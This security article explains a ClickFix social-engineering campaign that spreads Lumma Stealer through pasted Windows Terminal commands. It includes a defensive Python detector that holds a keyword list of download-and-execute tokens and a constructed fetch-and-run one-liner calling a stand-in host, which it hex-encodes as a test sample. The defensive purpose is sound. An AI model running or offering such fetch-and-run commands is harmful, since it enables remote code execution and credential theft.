
Mar 10, 2026 · 5 min read

That CAPTCHA Fix Asked You to Open Windows Terminal—It Was Deploying an Infostealer

Microsoft warns of a ClickFix campaign that social-engineers users into pasting hex-encoded commands into Windows Terminal, deploying the Lumma Stealer malware.

You visit a website. A popup appears telling you to verify your connection or fix a CAPTCHA error. The instructions seem simple: press Windows + X, open Terminal, and paste a short command. The page looks professional. The instructions sound reasonable. You paste the command.

In the time it takes to press Enter, a hex-encoded PowerShell script has downloaded a renamed 7-Zip utility, extracted a compressed payload, disabled your antivirus, established persistence on your machine, and deployed the Lumma Stealer infostealer. Your saved passwords from Chrome and Edge are already being exfiltrated.

Microsoft Threat Intelligence flagged the campaign in early March 2026, calling it an evolution of the ClickFix social engineering technique that has been circulating since 2025. The new variant specifically targets Windows Terminal, a tool that developers and power users open routinely, making the malicious instruction blend into normal behavior.

How the Social Engineering Works

The attack begins with a deceptive web page posing as a verification prompt, CAPTCHA check, or troubleshooting guide. The page instructs users to copy a command and paste it into Windows Terminal, framing the action as something harmless like verifying a connection or fixing a display error.

[Image: A person at a computer about to paste a command into a terminal window, illustrating the ClickFix social engineering attack]

The critical change is the shortcut the page asks for: Windows + X followed by I, which opens Windows Terminal. Previous ClickFix variants used the Win + R shortcut to open the Run dialog, which is more commonly associated with system commands and might raise suspicion. Terminal, by contrast, is a legitimate administrative tool that many developers open every day. Pasting a command into it feels routine.

The commands themselves are hex-encoded, making them look like random strings rather than executable instructions. To a non-technical user, a hex string looks no more threatening than a verification code.

The Infection Chain

Once the victim pastes the command, the infection triggers a surprisingly elaborate chain of events. The first pathway downloads a renamed 7-Zip utility alongside compressed payloads, then extracts components that establish persistence and disable antivirus protections before deploying the infostealer.

A secondary pathway uses batch scripts and VBScript executed through Windows utilities like MSBuild, with some variants accessing cryptocurrency blockchain infrastructure in a technique sometimes called EtherHiding. This approach stores command-and-control data on the blockchain, making it effectively impossible to take down.

The Lumma Stealer payload specifically targets browser credentials by injecting itself into Chrome and Edge processes to siphon stored login credentials and other browser data. Any password saved in your browser's password manager becomes accessible to the attacker within seconds of infection.

Why This Attack Is Effective

ClickFix exploits a fundamental trust gap. Security training teaches people to avoid clicking suspicious links and downloading unknown files. It rarely teaches them to be suspicious of pasting text into their own system tools.

The attack also bypasses most automated security controls. Email filters catch malicious attachments. Web filters block known malware download URLs. But there is no standard security product that monitors what a user pastes into Windows Terminal, because that is a legitimate action that millions of users perform every day.

This creates a social engineering sweet spot: the action is common enough to seem normal, technical enough to discourage scrutiny, and powerful enough to grant full system access.
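Although no product inspects the paste itself, PowerShell script block logging (Event ID 4104) does record the script text that actually executes, so the hex-encoded commands described above can be caught after the fact. The following is an added example, not code from Microsoft's report or the campaign: it scans constructed script-block text for long hex runs, decodes them, and flags decoded content that contains common download-and-execute tokens. The sample lines, the token list and the `example.invalid` URL are all constructed for illustration.

```python
import re
from typing import Dict, List

# Tokens that commonly appear in ClickFix-style one-liners (assumed list;
# extend it from your own telemetry rather than treating it as complete).
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "irm ", "invoke-restmethod",
                     "downloadstring", "invoke-webrequest", "frombase64string",
                     "-ep bypass", "-w hidden", "add-mppreference")

# A run of at least 16 hex byte pairs, not glued to other hex characters.
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){16,}(?![0-9A-Fa-f])")


def decode_hex_runs(text: str) -> List[str]:
    """Return the printable ASCII decoding of every long hex run in text."""
    decoded: List[str] = []
    for match in HEX_RUN.finditer(text):
        try:
            candidate = bytes.fromhex(match.group(0)).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid hex, or not ASCII once decoded
        if candidate.isprintable():
            decoded.append(candidate)
    return decoded


def score_command(script_text: str) -> Dict[str, object]:
    """Flag script text whose hex-encoded portion decodes to suspicious tokens."""
    decoded = decode_hex_runs(script_text)
    haystack = " ".join([script_text, *decoded]).lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in haystack]
    # Alert only when a hex blob was present AND its decoding looks malicious.
    return {"hex_decoded": decoded, "hits": hits,
            "alert": bool(decoded) and bool(hits)}


# Constructed samples (not real log data). The hex blob is built here from a
# hypothetical one-liner so the sample is readable and verifiably correct.
HIDDEN_COMMAND = "iex (irm http://example.invalid/verify)"
SAMPLE_HEX_LINE = "powershell -c " + HIDDEN_COMMAND.encode().hex()
BENIGN_LINE = "Get-ChildItem C:\\Users\\demo"
BENIGN_HEX_LINE = "Verification code: " + b"hello from a harmless string".hex()

if __name__ == "__main__":
    for line in (SAMPLE_HEX_LINE, BENIGN_LINE, BENIGN_HEX_LINE):
        print(score_command(line))
```

Feed real 4104 ScriptBlockText values into `score_command` to triage them; the benign hex sample shows that a hex string alone does not raise an alert.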

How to Protect Yourself

The defense against ClickFix is awareness, not technology. No legitimate website will ever ask you to open Windows Terminal and paste a command. This is not a normal verification step. It is not a CAPTCHA fix. It is not a connection test. Any site that requests this is attempting to execute code on your machine.

  • Never paste commands from websites into Terminal, PowerShell, or Command Prompt. This is the single most important rule.
  • Be skeptical of "fix" instructions. Legitimate CAPTCHA systems do not require command line interaction.
  • Use a standalone password manager instead of the browser's built-in password storage, which Lumma Stealer specifically targets.
  • Enable two-factor authentication on critical accounts so that stolen passwords alone are not sufficient for access.

For organizations, this campaign reinforces the need for security awareness training that goes beyond "don't click suspicious links." Employees need to understand that pasting commands into system tools is functionally equivalent to running a program from an untrusted source.